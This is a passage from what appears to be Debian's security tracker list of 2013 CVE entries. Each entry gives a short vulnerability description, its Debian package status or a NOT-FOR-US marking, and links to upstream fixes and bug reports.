CVE-2013-20001 (An issue was discovered in OpenZFS through 2.0.3. When an NFS share is ...) NOT-FOR-US: OpenZFS CVE-2013-7491 (An issue was discovered in the DBI module before 1.628 for Perl. Stack ...) - libdbi-perl 1.628-1 NOTE: https://github.com/perl5-dbi/dbi/commit/401f1221311c71f760e21c98772f0f7e3cbead1d NOTE: https://rt.cpan.org/Public/Bug/Display.html?id=85562 CVE-2013-7490 (An issue was discovered in the DBI module before 1.632 for Perl. Using ...) - libdbi-perl 1.633-1 NOTE: https://github.com/perl5-dbi/dbi/commit/a8b98e988d6ea2946f5f56691d6d5ead53f65766 NOTE: https://rt.cpan.org/Public/Bug/Display.html?id=86744 CVE-2013-7489 (The Beaker library through 1.11.0 for Python is affected by deserializ ...) - beaker (bug #966197) [bullseye] - beaker (Minor issue) [buster] - beaker (Minor issue) [stretch] - beaker (Minor issue) NOTE: https://github.com/bbangert/beaker/issues/191 NOTE: https://www.openwall.com/lists/oss-security/2020/05/14/11 CVE-2013-7488 (perl-Convert-ASN1 (aka the Convert::ASN1 module for Perl) through 0.27 ...) - libconvert-asn1-perl (bug #956186) [bullseye] - libconvert-asn1-perl (Minor issue) [buster] - libconvert-asn1-perl (Minor issue) [stretch] - libconvert-asn1-perl (Minor issue) [jessie] - libconvert-asn1-perl (Minor issue) NOTE: https://github.com/gbarr/perl-Convert-ASN1/issues/14 CVE-2013-7487 (On Swann DVR04B, DVR08B, DVR-16CIF, and DVR16B devices, raysharpdvr ap ...) NOT-FOR-US: Swann CVE-2013-7486 (Cross-site scripting (XSS) vulnerability in the backend in Open-Xchang ...) NOT-FOR-US: Open-Xchange App Suite CVE-2013-7485 (Cross-site scripting (XSS) vulnerability in the backend in Open-Xchang ...) NOT-FOR-US: Open-Xchange App Suite CVE-2013-7484 (Zabbix before 5.0 represents passwords in the users table with unsalte ...) - zabbix 1:5.0.0+dfsg-1 [buster] - zabbix (Minor issue) [stretch] - zabbix (Minor issue) [jessie] - zabbix (Minor issue) NOTE: https://support.zabbix.com/browse/ZBX-16551 NOTE: https://support.zabbix.com/browse/ZBXNEXT-1898 NOTE: https://www.zabbix.com/documentation/5.0/manual/introduction/whatsnew500#stronger_cryptography_for_passwords CVE-2013-7483 (The slidedeck2 plugin before 2.3.5 for WordPress has file inclusion. ...) NOT-FOR-US: slidedeck2 plugin for WordPress CVE-2013-7482 (The reflex-gallery plugin before 1.4.3 for WordPress has XSS. ...) NOT-FOR-US: reflex-gallery plugin for WordPress CVE-2013-7481 (The contact-form-plugin plugin before 3.3.5 for WordPress has XSS. ...) NOT-FOR-US: contact-form-plugin plugin for WordPress CVE-2013-7480 (The events-manager plugin before 5.3.6.1 for WordPress has XSS via the ...) NOT-FOR-US: events-manager plugin for WordPress CVE-2013-7479 (The events-manager plugin before 5.3.9 for WordPress has XSS in the se ...) NOT-FOR-US: events-manager plugin for WordPress CVE-2013-7478 (The events-manager plugin before 5.5 for WordPress has XSS via EM_Tick ...) NOT-FOR-US: events-manager plugin for WordPress CVE-2013-7477 (The events-manager plugin before 5.5.2 for WordPress has XSS in the bo ...) NOT-FOR-US: events-manager plugin for WordPress CVE-2013-7476 (The simple-fields plugin before 1.2 for WordPress has CSRF in the admi ...) NOT-FOR-US: simple-fields plugin for WordPress CVE-2013-7475 (The contact-form-plugin plugin before 3.52 for WordPress has XSS. ...) NOT-FOR-US: contact-form-plugin plugin for WordPress CVE-2013-7474 (Windu CMS 2.2 allows XSS via the name parameter to admin/content/edit ...) NOT-FOR-US: Windu CMS CVE-2013-7473 (Windu CMS 2.2 allows CSRF via admin/users/?mn=admin.message.error to a ...) NOT-FOR-US: Windu CMS CVE-2013-7472 (The "Count per Day" plugin before 3.2.6 for WordPress allows XSS via t ...) NOT-FOR-US: "Count per Day" plugin for WordPress CVE-2013-7471 (An issue was discovered in soap.cgi?service=WANIPConn1 on D-Link DIR-8 ...) NOT-FOR-US: D-Link CVE-2013-7470 (cipso_v4_validate in include/net/cipso_ipv4.h in the Linux kernel befo ...) - linux 3.11.7-1 NOTE: Fixed by: https://git.kernel.org/linus/f2e5ddcc0d12f9c4c7b254358ad245c9dddce13b CVE-2013-7469 (Seafile through 6.2.11 always uses the same Initialization Vector (IV) ...) - seafile 7.0.2-1 (bug #923009) [buster] - seafile (Minor issue) NOTE: https://github.com/haiwen/seafile/issues/350 CVE-2013-7468 (Simple Machines Forum (SMF) 2.0.4 allows PHP Code Injection via the in ...) NOT-FOR-US: Simple Machines Forum (SMF) CVE-2013-7467 (Simple Machines Forum (SMF) 2.0.4 allows XSS via the index.php?action= ...) NOT-FOR-US: Simple Machines Forum (SMF) CVE-2013-7466 (Simple Machines Forum (SMF) 2.0.4 allows local file inclusion, with re ...) NOT-FOR-US: Simple Machines Forum (SMF) CVE-2013-7465 (Ice Cold Apps Servers Ultimate 6.0.2(12) does not require authenticati ...) NOT-FOR-US: Ice Cold Apps Servers Ultimate CVE-2013-7464 (In csrf-magic before 1.0.4, if $GLOBALS['csrf']['secret'] is not confi ...) - zoneminder (Vulnerable code never in a embedded copy version for zoneminder) - cacti (Vulnerable code never in any release inclusing embedded copy, i.e. pre 1.0.4) NOTE: Issue is in embedded csrf-magic NOTE: https://repo.or.cz/csrf-magic.git/commit/9d2537f70d58b16aeba89779aaf1573b8d618e11 (v1.0.4) CVE-2013-7463 (The aescrypt gem 1.0.0 for Ruby does not randomize the CBC IV for use ...) NOT-FOR-US: aescrypt gem for Ruby CVE-2013-7462 (A directory traversal vulnerability in the web application in McAfee ( ...) NOT-FOR-US: Intel antivirus CVE-2013-7461 (A write protection and execution bypass vulnerability in McAfee (now I ...) NOT-FOR-US: Intel antivirus CVE-2013-7460 (A write protection and execution bypass vulnerability in McAfee (now I ...) NOT-FOR-US: Intel antivirus CVE-2013-7459 (Heap-based buffer overflow in the ALGnew function in block_templace.c ...) {DLA-773-1} - python-crypto 2.6.1-7 (bug #849495) [jessie] - python-crypto 2.6.1-5+deb8u1 NOTE: https://github.com/dlitz/pycrypto/issues/176 NOTE: Fixed by: https://github.com/dlitz/pycrypto/commit/8dbe0dc3eea5c689d4f76b37b93fe216cf1f00d4 NOTE: All users of pycrypto's AES module in Debian that allow the mode NOTE: of operation to be specified from outside check for ECB explicitly NOTE: and create the objects without specifying an IV. CVE-2013-7458 (linenoise, as used in Redis before 3.2.3, uses world-readable permissi ...) {DSA-3634-1 DLA-577-1} - redis 2:3.2.1-4 (bug #832460) NOTE: https://www.openwall.com/lists/oss-security/2016/07/28/1 CVE-2013-7457 (Unspecified vulnerability in the Qualcomm components in Android before ...) NOT-FOR-US: Qualcomm components for Android CVE-2013-7456 (gd_interpolation.c in the GD Graphics Library (aka libgd) before 2.1.1 ...) {DSA-3602-1 DSA-3587-1} - libgd2 2.1.1-1 [wheezy] - libgd2 (Vulnerable code not present) NOTE: https://github.com/libgd/libgd/commit/4f65a3e4eedaffa1efcf9ee1eb08f0b504fbc31a (gd-2.1.1) - php7.0 7.0.7-1 (unimportant) - php5 5.6.22+dfsg-1 (unimportant) NOTE: Starting with 5.4.0-1 Debian uses the system copy of libgd NOTE: PHP bug: https://bugs.php.net/bug.php?id=72227 NOTE: Fixed in 7.0.7, 5.6.22, 5.5.36 NOTE: https://www.openwall.com/lists/oss-security/2016/05/25/3 CVE-2013-7455 (Double free vulnerability in the DefaultICCintents function in cmscnvr ...) - lcms2 2.6-1 [wheezy] - lcms2 (vulnerable code not present, no cmsPipelineFree(Lut); in Error:-part) NOTE: https://www.kb.cert.org/vuls/id/369800 NOTE: https://github.com/mm2/Little-CMS/commit/fefaaa43c382eee632ea3ad0cfa915335140e1db#diff-189a94f0a7a47efdd43f5567e27a973b CVE-2013-7454 (The validator module before 1.1.0 for Node.js allows remote attackers ...) - validator.js (Fixed before initial release) CVE-2013-7453 (The validator module before 1.1.0 for Node.js allows remote attackers ...) - validator.js (Fixed before initial release) CVE-2013-7452 (The validator module before 1.1.0 for Node.js allows remote attackers ...) - validator.js (Fixed before initial release) CVE-2013-7451 (The validator module before 1.1.0 for Node.js allows remote attackers ...) - validator.js (Fixed before initial release) CVE-2013-7450 (Pulp before 2.3.0 uses the same the same certificate authority key and ...) NOT-FOR-US: Pulp (Red Hat) CVE-2013-7448 (Directory traversal vulnerability in wiki.c in didiwiki allows remote ...) {DSA-3485-1 DLA-424-1} - didiwiki 0.5-12 (bug #815111) NOTE: https://github.com/OpenedHand/didiwiki/pull/1/files NOTE: https://www.openwall.com/lists/oss-security/2016/02/19/4 CVE-2013-7447 (Integer overflow in the gdk_cairo_set_source_pixbuf function in gdk/gd ...) {DLA-419-1} - gtk+2.0 2.24.30-1.1 (bug #799275) [jessie] - gtk+2.0 2.24.25-3+deb8u1 [wheezy] - gtk+2.0 (Minor issue; can be fixed via wheezy-pu) - gtk+3.0 3.10.7-1 (bug #818090) [wheezy] - gtk+3.0 3.4.2-7+deb7u1 NOTE: https://bugzilla.gnome.org/show_bug.cgi?id=703220 NOTE: Fixed by: https://git.gnome.org/browse/gtk+/commit?id=894b1ae76a32720f4bb3d39cf460402e3ce331d6 CVE-2013-7446 (Use-after-free vulnerability in net/unix/af_unix.c in the Linux kernel ...) {DSA-3426-1 DLA-360-1} - linux 4.2.6-2 - linux-2.6 NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=1273845 NOTE: https://groups.google.com/forum/#!topic/syzkaller/3twDUI4Cpm8 NOTE: https://www.openwall.com/lists/oss-security/2015/11/18/9 NOTE: Introduced by: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ec0d215f9420564fc8286dcf93d2d068bb53a07e (v2.6.26-rc9) NOTE: Fixed by: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=7d267278a9ece963d77eefec61630223fce08c6c (v4.4-rc4) CVE-2013-7445 (The Direct Rendering Manager (DRM) subsystem in the Linux kernel throu ...) - linux [bullseye] - linux (Minor issue, requires invasive changes) [buster] - linux (Minor issue, requires invasive changes) [stretch] - linux (Minor issue, requires invasive changes) [jessie] - linux (Minor issue, requires invasive changes) [wheezy] - linux (Minor issue, requires invasive changes) - linux-2.6 NOTE: https://bugzilla.kernel.org/show_bug.cgi?id=60533 CVE-2013-7444 (The Special:Contributions page in MediaWiki before 1.22.0 allows remot ...) - mediawiki 1:1.25.5-1 (bug #799096) [wheezy] - mediawiki (Minor issues) [squeeze] - mediawiki (Not supported in Squeeze LTS) NOTE: https://phabricator.wikimedia.org/T106893 NOTE: https://github.com/wikimedia/mediawiki/commit/dc2966bd05b69321300c63fd0bd78e7c78ecea6e CVE-2013-7443 (Buffer overflow in the skip-scan optimization in SQLite 3.8.2 allows r ...) - sqlite3 3.8.3-1 [wheezy] - sqlite3 (Vulnerable code introduced in 3.8.2) [squeeze] - sqlite3 (Vulnerable code introduced in 3.8.2) NOTE: Fixed by: https://www.sqlite.org/src/info/ac5852d6403c9c96 NOTE: Introduced by: https://www.sqlite.org/src/info/b0bb975c0986fe01 NOTE: https://www.sqlite.org/src/info/520070ec7fbaac NOTE: https://www.openwall.com/lists/oss-security/2015/07/14/5 CVE-2013-7442 (GE Healthcare Centricity PACS Workstation 4.0 and 4.0.1 has a password ...) NOT-FOR-US: GE Healthcare Centricity PACS Workstation CVE-2013-7440 (The ssl.match_hostname function in CPython (aka Python) before 2.7.9 a ...) - python3.4 3.4~b1-4 - python3.3 3.3.3-1 - python3.2 [wheezy] - python3.2 (Minor issue, too intrusive to backport) - python3.1 [squeeze] - python3.1 (Minor issue) - python2.7 2.7.9-1 [wheezy] - python2.7 (Minor issue, too intrusive to backport) - python2.6 [wheezy] - python2.6 (Minor issue, too intrusive to backport) [squeeze] - python2.6 (Minor issue) - python2.5 [squeeze] - python2.5 (Minor issue) NOTE: https://bugs.python.org/issue17997#msg194950 NOTE: https://hg.python.org/cpython/rev/10d0edadbcdd NOTE: The CVE is only about refusing multiple wildcards. Backporting that part only is not so difficult. CVE-2013-7439 (Multiple off-by-one errors in the (1) MakeBigReq and (2) SetReqLen mac ...) {DSA-3224-1 DLA-199-1} - libx11 2:1.6.0-1 NOTE: http://cgit.freedesktop.org/xorg/lib/libX11/commit/?id=39547d600a13713e15429f49768e54c3173c828d NOTE: https://bugs.freedesktop.org/show_bug.cgi?id=56508 NOTE: https://www.openwall.com/lists/oss-security/2015/04/08/4 NOTE: The following packages will be recompiled after the release of NOTE: the DSA for wheezy and the DLA for squeeze: NOTE: libxrender (1:0.9.7-1+deb7u2 / 0.9.6-1+squeeze1+build1) NOTE: libxi (TBD / 1.3-8+build1) NOTE: libxfixes (TBD / 4.0.5-1+squeeze1+build1) NOTE: libxrandr (TBD / 1.3.0-3+squeeze1+build1) NOTE: libsdl1.2 (TBD / 1.2.14-6.1+build1) NOTE: libxv (TBD / 1.0.5-1+squeeze1+build1) NOTE: libxp (TBD / 1.0.0.xsf1-2+squeeze1+build1) NOTE: libxext (TBD / 1.1.2-1+squeeze1+build1) NOTE: xserver-xorg-video-vmware (TBD / 11.0.1-2+build1) NOTE: cairo (TBD / 1.8.10-6+build1) NOTE: open-vm-tools (TBD / 8.4.2-261024-1+build1) NOTE: wine-gecko-1.4 (wheezy) NOTE: list completed by analyzing http://codesearch.debian.net/results/SetReqLen and http://codesearch.debian.net/results/MakeBigReq CVE-2013-7438 (Multiple buffer overflows in pbm212030 allow remote attackers to cause ...) NOT-FOR-US: pbm2l2030 NOTE: http://www.openprinting.org/driver/pbm2l2030/ (typo in the official CVE description) CVE-2013-7441 (The modern style negotiation in Network Block Device (nbd-server) 2.9. ...) {DSA-3271-1} - nbd 1:3.4-1 (bug #781547) [squeeze] - nbd (Named export introduced in 2.9.17) NOTE: https://www.openwall.com/lists/oss-security/2015/05/19/6 CVE-2013-7435 (The open-ils.pcrud endpoint in Evergreen before 2.5.9, 2.6.x before 2. ...) NOT-FOR-US: Evergreen library CVE-2013-7434 RESERVED CVE-2013-7433 (Cross-site scripting (XSS) vulnerability in the Googlemaps plugin befo ...) NOT-FOR-US: Googlemaps plugin for Joomla! CVE-2013-7432 (The Googlemaps plugin before 3.1 for Joomla! allows remote attackers t ...) NOT-FOR-US: Googlemaps plugin for Joomla! CVE-2013-7431 (Full path disclosure in the Googlemaps plugin before 3.1 for Joomla!. ...) NOT-FOR-US: Googlemaps plugin for Joomla! CVE-2013-7430 (Cross-site scripting (XSS) vulnerability in the Googlemaps plugin befo ...) NOT-FOR-US: Googlemaps plugin for Joomla! CVE-2013-7429 (The Googlemaps plugin before 3.1 for Joomla! allows remote attackers t ...) NOT-FOR-US: Googlemaps plugin for Joomla! CVE-2013-7428 (The Googlemaps plugin before 3.1 for Joomla! allows remote attackers t ...) NOT-FOR-US: Googlemaps plugin for Joomla! CVE-2013-7427 RESERVED CVE-2013-7436 (noVNC before 0.5 does not set the secure flag for a cookie in an https ...) - novnc 1:0.4+dfsg+1+20131010+gitf68af8af3d-4 (bug #778618) [wheezy] - novnc (Only an issue in combination with later OpenStack components) NOTE: https://github.com/kanaka/noVNC/commit/ad941faddead705cd611921730054767a0b32dcd NOTE: https://www.openwall.com/lists/oss-security/2015/02/17/1 CVE-2013-7425 RESERVED CVE-2013-XXXX [TOCTOU race when expanding JAR files] - libbluray 0.7.0-1 (unimportant) NOTE: CVE Request: https://www.openwall.com/lists/oss-security/2015/02/06/9 NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=959433 NOTE: libbluray is only in wheezy and later and the issue is neutered by the kernel hardening for /tmp NOTE: Affected code removed in 0.7.0-1 CVE-2013-7437 (Multiple integer overflows in potrace 1.11 allow remote attackers to c ...) {DLA-675-1} - potrace 1.12-1 (bug #778646) [squeeze] - potrace (Minor issue) NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=955808 NOTE: https://www.openwall.com/lists/oss-security/2015/02/06/12 CVE-2013-7449 (The ssl_do_connect function in common/server.c in HexChat before 2.10. ...) - xchat 2.8.8-10 (bug #776609) [jessie] - xchat (Minor issue) [wheezy] - xchat (Minor issue) [squeeze] - xchat (Minor issue) - xchat-gnome (bug #829730) [wheezy] - xchat-gnome (Minor issue) [squeeze] - xchat-gnome (Minor issue) - hexchat 2.10.2-1 (bug #818009) [jessie] - hexchat 2.10.1-1+deb8u1 NOTE: https://github.com/hexchat/hexchat/issues/524 NOTE: https://github.com/hexchat/hexchat/commit/c9b63f7f9be01692b03fa15275135a4910a7e02d (v2.12.0) NOTE: https://github.com/hexchat/hexchat/commit/c99f2ba645d1f4d01d6d2bb0cc1238825e15c604 (v2.10.2) CVE-2013-7426 (Insecure Temporary file vulnerability in /tmp/kamailio_fifo in kamaili ...) - kamailio 4.0.2-1 (bug #712083) CVE-2013-7424 (The getaddrinfo function in glibc before 2.15, when compiled with libi ...) {DSA-3169-1 DLA-165-1} - glibc 2.15-1 - eglibc 2.15-1 NOTE: http://seclists.org/oss-sec/2015/q1/306 NOTE: Upstream fix: https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commitdiff;h=2e96f1c7 NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=981942 CVE-2013-7423 (The send_dg function in resolv/res_send.c in GNU C Library (aka glibc ...) {DLA-165-1} - glibc 2.19-1 (bug #722075) - eglibc [wheezy] - eglibc 2.13-38+deb7u5 NOTE: Fix: https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=f9d2d03254a58d92635a311a42253eeed5a40a47 NOTE: Upstream report: https://sourceware.org/bugzilla/show_bug.cgi?id=15946 NOTE: https://www.openwall.com/lists/oss-security/2015/01/28/16 CVE-2013-7421 (The Crypto API in the Linux kernel before 3.18.5 allows local users to ...) {DSA-3170-1} - linux 3.16.7-ckt4-2 - linux-2.6 [squeeze] - linux-2.6 (Introduced in v2.6.38-rc1) NOTE: https://lkml.org/lkml/2013/3/4/70 NOTE: https://plus.google.com/+MathiasKrause/posts/PqFCo4bfrWu NOTE: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=5d26a105b5a7 (v3.19-rc1) CVE-2013-7422 (Integer underflow in regcomp.c in Perl before 5.20, as used in Apple O ...) - perl 5.20.0-1 (bug #776046) [wheezy] - perl (Minor issue) [squeeze] - perl (Minor issue) NOTE: https://rt.perl.org/Public/Bug/Display.html?id=119505 NOTE: https://www.openwall.com/lists/oss-security/2015/01/23/9 CVE-2013-XXXX [lhasa: several directory traversal vulnerabilities] - lhasa 0.2.0-1 [wheezy] - lhasa (Minor issue) CVE-2013-7420 (Buffer overflow in Hancom Office 2010 SE allows remote attackers to ex ...) NOT-FOR-US: Hancom Office 2010 SE CVE-2013-7419 (Cross-site scripting (XSS) vulnerability in includes/refreshDate.php i ...) NOT-FOR-US: Joomlaskin JS Multi Hotel (aka JS MultiHotel and Js-Multi-Hotel) plugin for WordPress CVE-2013-7418 (cgi-bin/iptablesgui.cgi in IPCop (aka IPCop Firewall) before 2.1.5 all ...) NOT-FOR-US: IPCop CVE-2013-7417 (Cross-site scripting (XSS) vulnerability in cgi-bin/ipinfo.cgi in IPCo ...) NOT-FOR-US: IPCop CVE-2013-7416 (canto_curses/guibase.py in Canto Curses before 0.9.0 allows remote fee ...) - canto (bug #731582) [wheezy] - canto (Vulnerable code not present) [squeeze] - canto (Vulnerable code not present) CVE-2013-7415 RESERVED CVE-2013-7414 RESERVED CVE-2013-7413 RESERVED CVE-2013-7412 RESERVED CVE-2013-7411 RESERVED CVE-2013-7410 RESERVED CVE-2013-7409 (Buffer overflow in ALLPlayer 5.6.2 through 5.8.1 allows remote attacke ...) NOT-FOR-US: ALLPlayer CVE-2013-7408 (F5 BIG-IP Analytics 11.x before 11.4.0 uses a predictable session cook ...) NOT-FOR-US: F5 BIG-IP Analytics CVE-2013-7407 (Cross-site request forgery (CSRF) vulnerability in the MRBS module for ...) NOT-FOR-US: Drupal module MRBS CVE-2013-7406 (SQL injection vulnerability in the MRBS module for Drupal allows remot ...) NOT-FOR-US: Drupal module MRBS CVE-2013-7405 (The Ad Hoc Reporting feature in GE Healthcare Centricity DMS 4.2 has a ...) NOT-FOR-US: GE Healthcare Centricity DMS CVE-2013-7404 (GE Healthcare Discovery NM 750b has a password of 2getin for the insit ...) NOT-FOR-US: GE Healthcare Discovery NM 750b CVE-2013-7403 RESERVED NOT-FOR-US: WordPress plugin wp-video-commando CVE-2013-7400 (The Direct Mail (direct_mail) extension before 3.1.2 for TYPO3 allows ...) NOT-FOR-US: TYPO3 extension direct_mail CVE-2013-7399 RESERVED CVE-2013-7402 (Multiple unspecified vulnerabilities in request.c in c-icap 0.2.x allo ...) {DSA-3101-1} - c-icap 1:0.3.1-1 NOTE: http://sourceforge.net/p/c-icap/code/1018/ NOTE: http://sourceforge.net/p/c-icap/code/1021 CVE-2013-7401 (The parse_request function in request.c in c-icap 0.2.x allows remote ...) {DSA-3101-1} - c-icap 1:0.3.1-1 NOTE: http://sourceforge.net/p/c-icap/bugs/59/ NOTE: http://sourceforge.net/p/c-icap/code/1018/ CVE-2013-7398 (main/java/com/ning/http/client/AsyncHttpClientConfig.java in Async Htt ...) - async-http-client (Vulnerable code not present, bug #773364) NOTE: https://github.com/AsyncHttpClient/async-http-client/issues/197 NOTE: https://github.com/AsyncHttpClient/async-http-client/commit/3c9152e2c75f7e8b654beec40383748a14c6b51b CVE-2013-7397 (Async Http Client (aka AHC or async-http-client) before 1.9.0 skips X. ...) - async-http-client 1.6.5-3 [wheezy] - async-http-client (Minor issue) NOTE: https://github.com/AsyncHttpClient/async-http-client/issues/352 CVE-2013-7396 RESERVED CVE-2013-7395 (ZOLL Defibrillator / Monitor X Series has a default (1) supervisor pas ...) NOT-FOR-US: ZOLL Defibrillator / Monitor X Series CVE-2013-7394 (The "runshellscript echo.sh" script in Splunk before 5.0.5 allows remo ...) NOT-FOR-US: Splunk CVE-2013-7393 (The daemonize.py module in Subversion 1.8.0 before 1.8.2 allows local ...) - subversion 1.8.5-1 (unimportant) NOTE: Optional admin-side utilities in Subversion 1.8.x NOTE: split form CVE-2013-4262 CVE-2013-7392 (Gitlist allows remote attackers to execute arbitrary commands via shel ...) - gitlist (bug #750368) CVE-2013-7391 (The Entity API module 7.x-1.x before 7.x-1.2 for Drupal, when using th ...) NOT-FOR-US: Drupal contributed module Entity API CVE-2013-7390 (Unrestricted file upload vulnerability in AgentLogUploadServlet in Man ...) NOT-FOR-US: ManageEngine DesktopCentral CVE-2013-7389 (Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 ...) NOT-FOR-US: D-Link router CVE-2013-7388 (Heap-based buffer overflow in paintlib, as used in Trimble SketchUp (f ...) NOT-FOR-US: Trimble SketchUp CVE-2013-7387 (Session fixation vulnerability in DataLife Engine (DLE) 9.7 and earlie ...) NOT-FOR-US: DataLife Engine CVE-2013-7386 (Format string vulnerability in the PROJECT::write_account_file functio ...) - boinc 7.1.10+dfsg-1 (low) [squeeze] - boinc (Minor issue) [wheezy] - boinc (Minor issue) CVE-2013-7385 (LiveZilla 5.1.2.1 and earlier includes the MD5 hash of the operator pa ...) NOT-FOR-US: LiveZilla CVE-2013-7384 (UnrealIRCd 3.2.10 before 3.2.10.2 allows remote attackers to cause a d ...) - unrealircd (bug #515130) CVE-2013-7382 (VICIDIAL dialer (aka Asterisk GUI client) 2.8-403a, 2.7, 2.7RC1, and e ...) NOT-FOR-US: VICIDIAL CVE-2013-7381 (libnotify before 1.0.4 for Node.js allows remote attackers to execute ...) NOT-FOR-US: libnotify for Node.js CVE-2013-7380 (The Etherpad Lite ep_imageconvert Plugin has a Remote Command Injectio ...) NOT-FOR-US: Etherpad Lite ep_imageconvert Plugin CVE-2013-7379 (The admin API in the tomato module before 0.0.6 for Node.js does not p ...) NOT-FOR-US: tomato module for Node.js CVE-2013-7378 (scripts/email.coffee in the Hubot Scripts module before 2.4.4 for Node ...) NOT-FOR-US: Hubot Scripts module for Node.js CVE-2013-7377 (The codem-transcode module before 0.5.0 for Node.js, when ffprobe is e ...) NOT-FOR-US: codem-transcode Node module CVE-2013-7376 (Multiple cross-site request forgery (CSRF) vulnerabilities in OpenX 2. ...) NOT-FOR-US: OpenX CVE-2013-7383 (x2gocleansessions in X2Go Server before 4.0.0.8 and 4.0.1.x before 4.0 ...) - x2goserver (Fixed with first upload to Debian) NOTE: Fixed by: http://code.x2go.org/gitweb?p=x2goserver.git;a=commit;h=5a2aa0c36ef7a57d87e3bb6f7c6b2558ed5430f7 (4.0.1.10) NOTE: Fixed by: http://code.x2go.org/gitweb?p=x2goserver.git;a=commit;h=b03665513ab1969b069c1351fe17cbb8b5fca256 (4.0.0.8) NOTE: Fixed by: http://code.x2go.org/gitweb?p=x2goserver.git;a=commit;h=8347d3fef0e5cbabe4aa48f503612fa7b9d078f8 (4.0.0.8) NOTE: Fixed by: http://code.x2go.org/gitweb?p=x2goserver.git;a=commit;h=bf44925ecccda436caa1cfc34f89eced9c1bd104 (4.0.0.8) CVE-2013-7375 (SQL injection vulnerability in includes/classes/Authenticate.class.php ...) NOT-FOR-US: PHP-Fusion CVE-2013-7373 (Android before 4.4 does not properly arrange for seeding of the OpenSS ...) NOT-FOR-US: Android CVE-2013-7372 (The engineNextBytes function in classlib/modules/security/src/main/jav ...) NOT-FOR-US: Android CVE-2013-7369 (SQL injection vulnerability in an unspecified DLL in the FSDBCom Activ ...) NOT-FOR-US: F-Secure Anti-Virus CVE-2013-7374 (The Ubuntu Date and Time Indicator (aka indicator-datetime) 13.10.0+13 ...) NOT-FOR-US: indicator-datetime CVE-2013-7371 (node-connects before 2.8.2 has cross site scripting in Sencha Labs Con ...) - node-connect (Only applies when incomplete fix applied) NOTE: CVE for incomplete fix for CVE-2013-7370, fixed in 2.8.2 CVE-2013-7370 (node-connect before 2.8.1 has XSS in the Sencha Labs Connect middlewar ...) - node-connect 3.0.0-1 (bug #744374) CVE-2013-7368 (Multiple cross-site scripting (XSS) vulnerabilities in Gnew 2013.1 all ...) NOT-FOR-US: Gnew CVE-2013-7367 (SAP Enterprise Portal does not properly restrict access to the Federat ...) NOT-FOR-US: SAP CVE-2013-7366 (The SAP Software Deployment Manager (SDM), in certain unspecified cond ...) NOT-FOR-US: SAP CVE-2013-7365 (Cross-site scripting (XSS) vulnerability in SAP Enterprise Portal allo ...) NOT-FOR-US: SAP CVE-2013-7364 (An unspecified J2EE core service in the J2EE Engine in SAP NetWeaver d ...) NOT-FOR-US: SAP CVE-2013-7363 (Unspecified vulnerability in the Diagnostics (SMD) agent in SAP Soluti ...) NOT-FOR-US: SAP CVE-2013-7362 (An unspecified RFC function in SAP CCMS Agent allows remote attackers ...) NOT-FOR-US: SAP CVE-2013-7361 (Directory traversal vulnerability in SAP CMS and CM Services allows at ...) NOT-FOR-US: SAP CVE-2013-7360 (Unspecified vulnerability in SAP adminadapter allows remote attackers ...) NOT-FOR-US: SAP CVE-2013-7359 (Unspecified vulnerability in SAP Mobile Infrastructure allows remote a ...) NOT-FOR-US: SAP CVE-2013-7358 (Unspecified vulnerability in SAP Guided Procedures Archive Monitor all ...) NOT-FOR-US: SAP CVE-2013-7357 (Unspecified vulnerability in the configuration service in SAP J2EE Eng ...) NOT-FOR-US: SAP CVE-2013-7356 (Unspecified vulnerability in the SAP CCMS / Database Monitors for Orac ...) NOT-FOR-US: SAP CVE-2013-7355 (SQL injection vulnerability in SAP BI Universal Data Integration allow ...) NOT-FOR-US: SAP CVE-2013-7354 (Multiple integer overflows in libpng before 1.5.14rc03 allow remote at ...) - libpng (Only affects 1.5 and later) NOTE: http://sourceforge.net/p/png-mng/mailman/message/32215052/ NOTE: http://sourceforge.net/p/libpng/bugs/199/ - libpng1.6 1.6.10-1 CVE-2013-7353 (Integer overflow in the png_set_unknown_chunks function in libpng/pngs ...) - libpng (Only affects 1.5 and later) NOTE: http://sourceforge.net/p/png-mng/mailman/message/32215052/ NOTE: http://sourceforge.net/p/libpng/bugs/199/ - libpng1.6 1.6.10-1 CVE-2013-7352 (Cross-site request forgery (CSRF) vulnerability in blogs/admin.php in ...) NOT-FOR-US: b2evolution CVE-2013-7350 (Multiple unspecified vulnerabilities in Check Point Security Gateway 8 ...) NOT-FOR-US: Check Point Security Gateway CVE-2013-7349 (Multiple SQL injection vulnerabilities in Gnew 2013.1 allow remote att ...) NOT-FOR-US: Gnew CVE-2013-7346 (Cross-site request forgery (CSRF) vulnerability in Symphony CMS before ...) NOT-FOR-US: Symphony CMS CVE-2013-7351 (Multiple cross-site scripting (XSS) vulnerabilities in index.php in Sh ...) - shaarli 0.0.41~beta~dfsg2-4 (bug #743252) NOTE: https://github.com/sebsauvage/Shaarli/commit/53da201749f8f362323ef278bf338f1d9f7a925a CVE-2013-7348 (Double free vulnerability in the ioctx_alloc function in fs/aio.c in t ...) - linux 3.13.4-1 [wheezy] - linux (Introduced and fixed in 3.13 series) - linux-2.6 (Introduced and fixed in 3.13 series) NOTE: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=d558023207e008a4476a3b7bb8706b2a2bf5d84f CVE-2013-7347 (Luci in Red Hat Conga does not properly enforce the user session timeo ...) NOT-FOR-US: Red Hat Conga CVE-2013-7344 (Unspecified vulnerability in core/settings.php in ownCloud before 4.0. ...) - owncloud 5.0.3+dfsg-1 CVE-2013-7343 (Cross-site scripting (XSS) vulnerability in flowplayer.swf in the Flas ...) NOT-FOR-US: Flowplayer NOTE: Present in the source in some Moodle packages, see #736800 CVE-2013-7342 (Cross-site scripting (XSS) vulnerability in flowplayer.swf in the Flas ...) NOT-FOR-US: Flowplayer NOTE: Present in the source in some Moodle packages, see #736800 CVE-2013-7340 (VideoLAN VLC Media Player before 2.0.7 allows remote attackers to caus ...) - vlc 2.2.0~rc2-1 (unimportant) NOTE: No security impact NOTE: Might be fixed earlier than 2.2.0~rc2, but only that version was checked 